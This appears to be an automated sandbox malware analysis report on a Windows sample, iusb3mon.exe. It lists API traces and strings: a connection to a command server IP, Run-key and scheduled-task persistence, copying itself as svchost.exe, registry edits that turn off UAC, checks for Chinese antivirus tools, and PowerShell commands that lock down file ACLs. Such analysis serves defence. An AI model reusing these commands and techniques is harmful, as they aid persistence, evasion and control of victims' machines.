Opcode Fuzzy Hash: da1785d8271c4d5ca222422800b9774c1d7d18ff10afa72a62cfac10f8c4a1fb
Instruction Fuzzy Hash: 4501F27191A341DAF7108AA5CA80B66FF98DF41364F0CC05AED4C4E2C3C6B89889CAB1

Function 0320D007 Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.2423421564.000000000320D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0320D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_320d000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f9034f23507cee64aa2dbc6eef4b67319b9816a3a83e0003f9ecc6d4c3303aaf
Instruction ID: ed63f850712bff80aa98056ce97af139550c9766a91d554140cebc80365fd069
Opcode Fuzzy Hash: f9034f23507cee64aa2dbc6eef4b67319b9816a3a83e0003f9ecc6d4c3303aaf
Instruction Fuzzy Hash: 8901007240E3C09FE7128B25C994B52BFB4DF43224F1D81DBD9888F5A3C2695849C772

Function 04F86F43 Relevance: .0, Instructions: 41COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.2431951010.0000000004F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_4f80000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 58fcbb1a0c0665854791d7bc25813fc3d43e85ddcefc52dfdf4da161ce6945c8
Instruction ID: d6777de8321524ad6062094d3fc7be7f6c564b0438ababf057f7040ed0b443f3
Opcode Fuzzy Hash: 58fcbb1a0c0665854791d7bc25813fc3d43e85ddcefc52dfdf4da161ce6945c8
Instruction Fuzzy Hash: C6012C78A4020A8FDB81EF68C445A5DBFB1BF09214F5041A9D509EB322E631EA42CBD1

Function 04F86F50 Relevance: .0, Instructions: 28COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.2431951010.0000000004F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_4f80000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 42cce5df637075769670322fc303ba83c3c284cf27a7a655addfdfc6339049c2
Instruction ID: 05f3d616324cc07404a140f107547c2cba5790376c765f35923b661f6b39291f
Opcode Fuzzy Hash: 42cce5df637075769670322fc303ba83c3c284cf27a7a655addfdfc6339049c2
Instruction Fuzzy Hash: E2F09774E0020A8FC780DF68C485AAEBBF1FF49214F505199E509EB321E630A941CB91

Function 04F8718C Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.2431951010.0000000004F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_4f80000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 910263cc89cbc8b494a17a2eb6c407b04660c3b95a8c6685af3ddf83757ea670
Instruction ID: c900ec8a06449a0f125ea8dd9c60cb35cc44aae245fcbe7ed711e21a6ebf3d4e
Opcode Fuzzy Hash: 910263cc89cbc8b494a17a2eb6c407b04660c3b95a8c6685af3ddf83757ea670
Instruction Fuzzy Hash: C5E0C2725012958FCB16CB51E4904FABFB4EE4216A31440EAE59527211D2309A5ADBB0

Analysis Process: iusb3mon.exePID: 4196, Parent PID: 1064COMMON

Execution Graph

Execution Coverage:	1.8%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	29.6%
Total number of Nodes:	479
Total number of Limit Nodes:	34

Executed Functions

Function 06CF67CC Relevance: 131.7, APIs: 44, Strings: 31, Instructions: 466
filethreadnetworkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetThreadExecutionState.KERNEL32(80000003), ref: 06CF67DD
DeleteFileA.KERNEL32(C:\del), ref: 06CF67EE
DeleteFileA.KERNEL32(C:\tzfz), ref: 06CF67F5
DeleteFileA.KERNEL32(C:\1.ini), ref: 06CF67FC
DeleteFileA.KERNEL32(C:\2.ini), ref: 06CF6803
DeleteFileA.KERNEL32(C:\inst.ini), ref: 06CF680A
DeleteFileA.KERNEL32(C:\odbc.ini), ref: 06CF6811
DeleteFileA.KERNEL32(C:\odbc.inst.ini), ref: 06CF6818
DeleteFileA.KERNEL32(C:\ProgramData\Microsoft\EdgeUpdate\Log\chuangkou.log), ref: 06CF681F

Part of subcall function 06CF1C74: SetFileAttributesA.KERNEL32(00000000,00000080,06CF682E,C:\ProgramData\Microsoft\Program\ziliao.jpg,00000000), ref: 06CF1C88

Part of subcall function 06CF5CE6: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000001,00000000), ref: 06CF5CF6
Part of subcall function 06CF5CE6: Process32First.KERNEL32(00000000,?), ref: 06CF5D0F
Part of subcall function 06CF5CE6: Process32Next.KERNEL32(00000000,00000128), ref: 06CF5D2A
Part of subcall function 06CF5CE6: CloseHandle.KERNEL32(00000000,00000002,00000000,00000001,00000000), ref: 06CF5D4F

WinExec.KERNEL32(powershell.exe -NoProfile -C "Set-Content -Value @('[Unicode]','Unicode=yes','[Version]','signature=\"$CHICAGO$\"','Revision=1','[Privilege Rights]','SeDebugPrivilege = *S-1-5-18','[File Security]','\"C:\ProgramData\Program\",0,\"D:AR(D;OICI;DTSDRCWD;;;WD)\"'),00000000), ref: 06CF68AB
WinExec.KERNEL32(powershell.exe -NoProfile -C "Set-Content -Value @('[Unicode]','Unicode=yes','[Version]','signature=\"$CHICAGO$\"','Revision=1','[Privilege Rights]','SeDebugPrivilege = *S-1-5-18','[File Security]','\"C:\ProgramData\Data\",0,\"D:AR(D;OICI;DTSDRCWD;;;WD)\"') -P,00000000), ref: 06CF68B3
WinExec.KERNEL32(powershell.exe -NoProfile -C "[IO.File]::WriteAllBytes([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.inf'), [Convert]::FromBase64String('//5bAFUAbgBpAGMAbwBkAGUAXQANAAoAVQBuAGkAYwBvAGQAZQA9AHkAZQBzAA0ACgBbAFYAZQByAHMAaQBvAG4AXQANAAoAcwBpAGcAbgBhAHQAdQByAGUA,00000000), ref: 06CF68BB
CreateThread.KERNEL32(00000000,00000000,06CF628E,00000000,00000000,00000000), ref: 06CF68D5
CreateThread.KERNEL32(00000000,00000000,06CF5E1F,00000000,00000000,00000000), ref: 06CF68E9
CreateThread.KERNEL32(00000000,00000000,06CF5D5B,00000000,00000000,00000000), ref: 06CF68FD
CreateThread.KERNEL32(00000000,00000000,06CF6313,00000000,00000000,00000000), ref: 06CF6911
CreateThread.KERNEL32(00000000,00000000,06CF650A,00000000,00000000,00000000), ref: 06CF6925
CreateThread.KERNEL32(00000000,00000000,06CF6780,00000000,00000000,00000000), ref: 06CF6931
CreateThread.KERNEL32(00000000,00000000,06CF1B6D,00000000,00000000,00000000), ref: 06CF693D
CreateThread.KERNEL32(00000000,00000000,06CF6587,00000000,00000000,00000000), ref: 06CF6949
WSAStartup.WS2_32(00000002,?), ref: 06CF6A11
socket.WS2_32(00000002,00000001,00000000), ref: 06CF6A1C
GetCurrentThreadId.KERNEL32 ref: 06CF6A2B
htons.WS2_32(00006365), ref: 06CF6A32
inet_addr.WS2_32(143.92.60.116), ref: 06CF6A3D
connect.WS2_32(?,00000002,00000010), ref: 06CF6A4F
InternetOpenA.WININET(Mozilla/4.0 (compatible),00000000,00000000,00000000,00000000), ref: 06CF6A9F
InternetOpenUrlA.WININET(?,?,00000000,00000000,80000100,00000000), ref: 06CF6AD7
InternetReadFile.WININET(?,?,00000824,?), ref: 06CF6AF3
InternetCloseHandle.WININET(?), ref: 06CF6B3C
InternetCloseHandle.WININET(?), ref: 06CF6B45
GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 06CF6B7A
GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 06CF6BF4
CopyFileA.KERNEL32(?,?,00000000), ref: 06CF6C06
RegOpenKeyExA.ADVAPI32(80000001,SOFTWARE\Microsoft\Windows\CurrentVersion\Run,00000000,000F003F,?), ref: 06CF6C20
RegSetValueExA.ADVAPI32(?,06D22BD8,00000000,00000001,?,00000018), ref: 06CF6C3B
RegCloseKey.ADVAPI32(?), ref: 06CF6C44
Sleep.KERNEL32(0000003C), ref: 06CF6C51
ExitProcess.KERNEL32 ref: 06CF6C5A
StartServiceCtrlDispatcherA.ADVAPI32(?), ref: 06CF6C8E
Sleep.KERNEL32(0000003C), ref: 06CF6CAD
GetModuleFileNameA.KERNEL32(00000000,?,000000E1), ref: 06CF6D1D
CopyFileA.KERNEL32(?,C:\Windows\svchost.exe,00000000), ref: 06CF6D2F
Sleep.KERNEL32(000001F4), ref: 06CF6D56

Strings

Mozilla/4.0 (compatible), xrefs: 06CF6A9A
C:\ProgramData\Microsoft\Program, xrefs: 06CF683D
powershell.exe -NoProfile -C "Set-Content -Value @('[Unicode]','Unicode=yes','[Version]','signature=\"$CHICAGO$\"','Revision=1','[Privilege Rights]','SeDebugPrivilege = *S-1-5-18','[File Security]','\"C:\ProgramData\Program\",0,\"D:AR(D;OICI;DTSDRCWD;;;WD)\"'), xrefs: 06CF68A6
C:\2.ini, xrefs: 06CF67FE
C:\odbc.inst.ini, xrefs: 06CF6813
c:\inst.ini, xrefs: 06CF6967, 06CF69A3
360Tray.exe, xrefs: 06CF6890, 06CF6957
powershell.exe -NoProfile -C "[IO.File]::WriteAllBytes([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.inf'), [Convert]::FromBase64String('//5bAFUAbgBpAGMAbwBkAGUAXQANAAoAVQBuAGkAYwBvAGQAZQA9AHkAZQBzAA0ACgBbAFYAZQByAHMAaQBvAG4AXQANAAoAcwBpAGcAbgBhAHQAdQByAGUA, xrefs: 06CF68B6
C:\inst.ini, xrefs: 06CF6805
C:\ProgramData\Program, xrefs: 06CF6848, 06CF6B86
C:\ProgramData\Data\upx.exe, xrefs: 06CF685E
C:\del, xrefs: 06CF67E9
C:\tzfz, xrefs: 06CF67F0
143.92.60.116, xrefs: 06CF69F8, 06CF6A38, 06CF6AB0, 06CF6B17, 06CF6B2A
powershell.exe -NoProfile -C "Set-Content -Value @('[Unicode]','Unicode=yes','[Version]','signature=\"$CHICAGO$\"','Revision=1','[Privilege Rights]','SeDebugPrivilege = *S-1-5-18','[File Security]','\"C:\ProgramData\Data\",0,\"D:AR(D;OICI;DTSDRCWD;;;WD)\"') -P, xrefs: 06CF68AE
Cdefgh Jklmnopq Stuvwxya Cdef, xrefs: 06CF6D3F
C:\odbc.ini, xrefs: 06CF680C
Cdefghij Lmnopqrst Vwxyabc Efghijkl Nop, xrefs: 06CF6D3A
360tray.exe, xrefs: 06CF6881, 06CF6993
C:\ProgramData\Microsoft\Program\ziliao.jpg, xrefs: 06CF6824
C:\1.ini, xrefs: 06CF67F7
SOFTWARE\Microsoft\Windows\CurrentVersion\Run, xrefs: 06CF6C16
C:\ProgramData\Program\iusb3mon.exe, xrefs: 06CF6832
iiiiiiiiiiiii.exe, xrefs: 06CF69C8
C:\ProgramData\Microsoft\EdgeUpdate\Log\chuangkou.log, xrefs: 06CF681A
http://%s/ip.txt, xrefs: 06CF6AB7
iiiiiiiiiiiiiiii.exe, xrefs: 06CF698C
C:\Windows\svchost.exe, xrefs: 06CF6D23, 06CF6D27
C:\ProgramData, xrefs: 06CF6853
C:\un.exe, xrefs: 06CF6869
C:\ProgramData\Data\upx.rar, xrefs: 06CF6874

Memory Dump Source

Source File: 00000021.00000002.4653240535.0000000006CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06CF0000, based on PE: true

Associated: 00000021.00000002.4653240535.0000000006D21000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D23000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D26000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D28000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D2A000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_6cf0000_iusb3mon.jbxd

Yara matches

Similarity

API ID: File$Thread$Create$Delete$Internet$Close$ExecHandleModuleNameOpenSleep$CopyProcess32$AttributesCtrlCurrentDispatcherExecutionExitFirstNextProcessReadServiceSnapshotStartStartupStateToolhelp32Valueconnecthtonsinet_addrsocket
String ID: 143.92.60.116$360Tray.exe$360tray.exe$C:\1.ini$C:\2.ini$C:\ProgramData$C:\ProgramData\Data\upx.exe$C:\ProgramData\Data\upx.rar$C:\ProgramData\Microsoft\EdgeUpdate\Log\chuangkou.log$C:\ProgramData\Microsoft\Program$C:\ProgramData\Microsoft\Program\ziliao.jpg$C:\ProgramData\Program$C:\ProgramData\Program\iusb3mon.exe$C:\Windows\svchost.exe$C:\del$C:\inst.ini$C:\odbc.ini$C:\odbc.inst.ini$C:\tzfz$C:\un.exe$Cdefgh Jklmnopq Stuvwxya Cdef$Cdefghij Lmnopqrst Vwxyabc Efghijkl Nop$Mozilla/4.0 (compatible)$SOFTWARE\Microsoft\Windows\CurrentVersion\Run$c:\inst.ini$http://%s/ip.txt$iiiiiiiiiiiii.exe$iiiiiiiiiiiiiiii.exe$powershell.exe -NoProfile -C "Set-Content -Value @('[Unicode]','Unicode=yes','[Version]','signature=\"$CHICAGO$\"','Revision=1','[Privilege Rights]','SeDebugPrivilege = *S-1-5-18','[File Security]','\"C:\ProgramData\Data\",0,\"D:AR(D;OICI;DTSDRCWD;;;WD)\"') -P$powershell.exe -NoProfile -C "Set-Content -Value @('[Unicode]','Unicode=yes','[Version]','signature=\"$CHICAGO$\"','Revision=1','[Privilege Rights]','SeDebugPrivilege = *S-1-5-18','[File Security]','\"C:\ProgramData\Program\",0,\"D:AR(D;OICI;DTSDRCWD;;;WD)\"')$powershell.exe -NoProfile -C "[IO.File]::WriteAllBytes([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.inf'), [Convert]::FromBase64String('//5bAFUAbgBpAGMAbwBkAGUAXQANAAoAVQBuAGkAYwBvAGQAZQA9AHkAZQBzAA0ACgBbAFYAZQByAHMAaQBvAG4AXQANAAoAcwBpAGcAbgBhAHQAdQByAGUA
API String ID: 1792369710-2238585741
Opcode ID: 709c6f089fe69c579cb43593c77d51dc84f1ac0cf4d2b1b68b6c8f3ea8d89a23
Instruction ID: 168487ff7b3a75abbf4b09f8eb32645d3162d3101e4231e5715d0f8944a4c219
Opcode Fuzzy Hash: 709c6f089fe69c579cb43593c77d51dc84f1ac0cf4d2b1b68b6c8f3ea8d89a23
Instruction Fuzzy Hash: 56E1C1B196025DBEFBD0ABA1AC85EAF7B7DDF05658F00045AF314A5241CBB48E48CB71

Function 00C02170 Relevance: 79.3, APIs: 35, Strings: 10, Instructions: 549
sleepcomwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(00002710,22D6AB0D), ref: 00C021A2
CoInitializeEx.OLE32(00000000,00000000), ref: 00C021AC
CoCreateInstance.COMBASE(00C1F104,00000000,00000001,00C1F0F4,?), ref: 00C021EC
CoUninitialize.COMBASE ref: 00C02209

Part of subcall function 00C02DE0: std::_Lockit::_Lockit.LIBCPMT ref: 00C02E36
Part of subcall function 00C02DE0: std::_Lockit::_Lockit.LIBCPMT ref: 00C02E58
Part of subcall function 00C02DE0: std::_Lockit::~_Lockit.LIBCPMT ref: 00C02E78
Part of subcall function 00C02DE0: std::_Facet_Register.LIBCPMT ref: 00C02EE5
Part of subcall function 00C02DE0: std::_Lockit::~_Lockit.LIBCPMT ref: 00C02F01

_com_issue_error.COMSUPP ref: 00C027CB
MessageBoxA.USER32(00000000,00C289C0,00C289B8,00001010), ref: 00C027F1

Strings

Failed to connect to Task Service., xrefs: 00C022D0, 00C02394
C:\ProgramData\program\iusb3mon.exe, xrefs: 00C02587
User Name, xrefs: 00C024E9
Task registered successfully., xrefs: 00C02757
Failed to create Task Service inst ance., xrefs: 00C021F6
Failed to get root folder., xrefs: 00C02453
Failed to register task., xrefs: 00C02775
UserLoginStartupTask, xrefs: 00C0267D
Failed to create task definition., xrefs: 00C02499
Failed to initialize COM library., xrefs: 00C021B6

Memory Dump Source

Source File: 00000021.00000002.4641361080.0000000000C01000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00C00000, based on PE: true

Associated: 00000021.00000002.4641280448.0000000000C00000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4641470551.0000000000C1E000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4642950817.0000000000C2C000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4643038752.0000000000C2E000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4643154728.0000000000C59000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4643234558.0000000000C5A000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4643316484.0000000000C74000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4643316484.0000000000CA0000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4643316484.0000000000CC3000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4643316484.0000000000CE4000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4643316484.0000000000D06000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4643316484.0000000000D0C000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4643316484.0000000000D0E000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4643316484.0000000000D10000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4643316484.0000000000D12000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4643316484.0000000000D14000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4643316484.0000000000D2C000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4643316484.0000000000D30000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4643316484.0000000000D3C000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4643316484.0000000000D60000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4643316484.0000000000D65000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4643316484.0000000000D6D000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4646248262.0000000000FF8000.00000020.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_c00000_iusb3mon.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$CreateFacet_InitializeInstanceMessageRegisterSleepUninitialize_com_issue_error
String ID: C:\ProgramData\program\iusb3mon.exe$Failed to connect to Task Service.$Failed to create Task Service inst ance.$Failed to create task definition.$Failed to get root folder.$Failed to initialize COM library.$Failed to register task.$Task registered successfully.$User Name$UserLoginStartupTask
API String ID: 1252467509-2564446508
Opcode ID: 149877cac5ba13993b3d79d659ac1be89ed05fc93bba6364a422ca3a563bb87c
Instruction ID: 51164f3503aa0f11e541abcc9a2910fe7a031682b41a4983df7519b9a921b2d0
Opcode Fuzzy Hash: 149877cac5ba13993b3d79d659ac1be89ed05fc93bba6364a422ca3a563bb87c
Instruction Fuzzy Hash: 91225371E00219DFDB10EFA8CC49B9EB7B8EF59314F108154E955FB291EB30AA85CB61

Function 06CF1B6D Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 60
registrysleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(00000BB8), ref: 06CF1B7A

Part of subcall function 06CF1B34: GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,06CF1B85), ref: 06CF1B47
Part of subcall function 06CF1B34: GetProcAddress.KERNEL32(00000000), ref: 06CF1B4E
Part of subcall function 06CF1B34: GetCurrentProcess.KERNEL32(00000000,?,?,?,06CF1B85), ref: 06CF1B5E

RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System,00000000,-00000200,?), ref: 06CF1BAD
RegSetValueExA.ADVAPI32(?,ConsentPromptBehaviorAdmin,00000000,00000004,?,00000004), ref: 06CF1BCB
RegSetValueExA.ADVAPI32(?,EnableLUA,00000000,00000004,?,00000004), ref: 06CF1BDC
RegSetValueExA.ADVAPI32(?,PromptOnSecureDesktop,00000000,00000004,?,00000004), ref: 06CF1BED
RegCloseKey.ADVAPI32(?), ref: 06CF1BF2

Strings

SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System, xrefs: 06CF1BA0
PromptOnSecureDesktop, xrefs: 06CF1BE5
ConsentPromptBehaviorAdmin, xrefs: 06CF1BC3
EnableLUA, xrefs: 06CF1BD4

Memory Dump Source

Source File: 00000021.00000002.4653240535.0000000006CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06CF0000, based on PE: true

Associated: 00000021.00000002.4653240535.0000000006D21000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D23000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D26000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D28000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D2A000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_6cf0000_iusb3mon.jbxd

Yara matches

Similarity

API ID: Value$AddressCloseCurrentHandleModuleOpenProcProcessSleep
String ID: ConsentPromptBehaviorAdmin$EnableLUA$PromptOnSecureDesktop$SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System
API String ID: 3477048420-3549642244
Opcode ID: d1375c5239c400f317bb23c43cd09b64614cdc94080be93606f8e8f2ec2e6eb3
Instruction ID: 2fa4c15c7e6fafbdcfb54c138f25174db5851d25f9ea0d9c96827ecaf10806bb
Opcode Fuzzy Hash: d1375c5239c400f317bb23c43cd09b64614cdc94080be93606f8e8f2ec2e6eb3
Instruction Fuzzy Hash: CE0140B155014CFEF7519BA2DC8AEEF7F3CEB81750F10046AB601E5150DAB05E08DA70

Function 06CF5CE6 Relevance: 6.0, APIs: 4, Instructions: 40
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000001,00000000), ref: 06CF5CF6
Process32First.KERNEL32(00000000,?), ref: 06CF5D0F
Process32Next.KERNEL32(00000000,00000128), ref: 06CF5D2A
CloseHandle.KERNEL32(00000000,00000002,00000000,00000001,00000000), ref: 06CF5D4F

Memory Dump Source

Source File: 00000021.00000002.4653240535.0000000006CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06CF0000, based on PE: true

Associated: 00000021.00000002.4653240535.0000000006D21000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D23000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D26000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D28000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D2A000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_6cf0000_iusb3mon.jbxd

Yara matches

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
String ID:
API String ID: 420147892-0
Opcode ID: 677bb286e4151f8041c2ec9f9b3eb74c46f3ca4e4d4c0d951350e546f7d6a75c
Instruction ID: 163afa5b5a7a76718065380b20d09d5e973a20c7b10a8ef16b09e878bd653c64
Opcode Fuzzy Hash: 677bb286e4151f8041c2ec9f9b3eb74c46f3ca4e4d4c0d951350e546f7d6a75c
Instruction Fuzzy Hash: 37F06271A01209AAEBE09BA59D84FEAB7BCEF58354F5000B9A704D2180DE74CA958B31

Function 06CF5E1F Relevance: 68.6, APIs: 32, Strings: 7, Instructions: 330
registrysleepprocessCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 06CF5CE6: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000001,00000000), ref: 06CF5CF6
Part of subcall function 06CF5CE6: Process32First.KERNEL32(00000000,?), ref: 06CF5D0F
Part of subcall function 06CF5CE6: Process32Next.KERNEL32(00000000,00000128), ref: 06CF5D2A
Part of subcall function 06CF5CE6: CloseHandle.KERNEL32(00000000,00000002,00000000,00000001,00000000), ref: 06CF5D4F

RegOpenKeyExA.ADVAPI32(80000002,06D1D344,00000000,00020119,?), ref: 06CF5E63
Sleep.KERNEL32(Q360SafeMonClass), ref: 06CF5E9D
FindWindowA.USER32(Q360SafeMonClass,00000000), ref: 06CF5EA9
Sleep.KERNEL32(C:\ProgramData\Microsoft\MicrosoftNetFramework.xml,0000000A), ref: 06CF5F0A
WinExec.KERNEL32(06D1D22C,00000000), ref: 06CF5F16
RegOpenKeyExA.ADVAPI32(80000002,06D1D344,00000000,00020119,?), ref: 06CF5F49
Sleep.KERNEL32(Q360SafeMonClass), ref: 06CF5F80
FindWindowA.USER32(Q360SafeMonClass,00000000), ref: 06CF5F8C
RegOpenKeyExA.ADVAPI32(80000002,06D1D344,00000000,00020119,?), ref: 06CF5FF6
Sleep.KERNEL32(000007D0), ref: 06CF6283

Part of subcall function 06CF5DA7: FindWindowA.USER32(?,00000000), ref: 06CF5DB1
Part of subcall function 06CF5DA7: PostMessageA.USER32(00000000,00000010,00000000,00000000), ref: 06CF5DE5
Part of subcall function 06CF5DA7: SendMessageA.USER32(00000000,00000010,00000000,00000000), ref: 06CF5DF0

Sleep.KERNEL32(Q360SafeMonClass), ref: 06CF6035
FindWindowA.USER32(Q360SafeMonClass,00000000), ref: 06CF6041
Sleep.KERNEL32(C:\ProgramData\Microsoft\MicrosoftNetFramework.xml,0000000A), ref: 06CF609F
WinExec.KERNEL32(06D1D22C,00000000), ref: 06CF60AB
Sleep.KERNEL32(Q360SafeMonClass), ref: 06CF60E1
FindWindowA.USER32(Q360SafeMonClass,00000000), ref: 06CF60ED

Part of subcall function 06CF7B7D: __EH_prolog.LIBCMT ref: 06CF7B82

Part of subcall function 06CF7109: __EH_prolog.LIBCMT ref: 06CF710E

Part of subcall function 06CF7AC4: CreateFileA.KERNEL32(?,40000000,00000001,00000000,00000002,00000000,00000000,C:\ProgramData\Program\iusb3mon.exe,00000000,06D28518,06CF6098,C:\ProgramData\Microsoft\MicrosoftNetFramework.xml,0000000A), ref: 06CF7ADA
Part of subcall function 06CF7AC4: WriteFile.KERNEL32(00000000,06D18760,00000EE2,?,00000000), ref: 06CF7AF2
Part of subcall function 06CF7AC4: CloseHandle.KERNEL32(00000000), ref: 06CF7AFF

RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Run,00000000,000F023F,?,0000000A), ref: 06CF6152
GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 06CF615F
RegSetValueExA.ADVAPI32(?,Microsoft,00000000,00000001,C:\ProgramData\Program\iusb3mon.exe,00000001), ref: 06CF617B
RegCloseKey.ADVAPI32(?), ref: 06CF6185
RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Run,00000000,000F013F,?), ref: 06CF61A0
GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 06CF61B0
RegSetValueExA.ADVAPI32(?,Microsoft,00000000,00000001,C:\ProgramData\Program\iusb3mon.exe,00000001), ref: 06CF61CC
RegCloseKey.ADVAPI32(?), ref: 06CF61D6
RegOpenKeyExA.ADVAPI32(80000001,SOFTWARE\Microsoft\Windows\CurrentVersion\Run,00000000,000F023F,?), ref: 06CF61F1
GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 06CF6201
RegSetValueExA.ADVAPI32(?,Microsoft,00000000,00000001,C:\ProgramData\Program\iusb3mon.exe,00000001), ref: 06CF621D
RegCloseKey.ADVAPI32(?), ref: 06CF6227
RegOpenKeyExA.ADVAPI32(80000001,SOFTWARE\Microsoft\Windows\CurrentVersion\Run,00000000,000F013F,?), ref: 06CF6242
GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 06CF6252
RegSetValueExA.ADVAPI32(?,Microsoft,00000000,00000001,C:\ProgramData\Program\iusb3mon.exe,00000001), ref: 06CF626E
RegCloseKey.ADVAPI32(?), ref: 06CF6278

Strings

QQPCTray.exe, xrefs: 06CF5E3B
C:\ProgramData\Microsoft\MicrosoftNetFramework.xml, xrefs: 06CF5EF9, 06CF608E
Microsoft, xrefs: 06CF60B1, 06CF6172, 06CF61C3, 06CF6214, 06CF6265
qqpctray.exe, xrefs: 06CF5F21
SOFTWARE\Microsoft\Windows\CurrentVersion\Run, xrefs: 06CF60B6, 06CF6148, 06CF6196, 06CF61E7, 06CF6238
Q360SafeMonClass, xrefs: 06CF5E8C, 06CF5EA4, 06CF5F6F, 06CF5F87, 06CF6024, 06CF603C, 06CF60D0, 06CF60E8
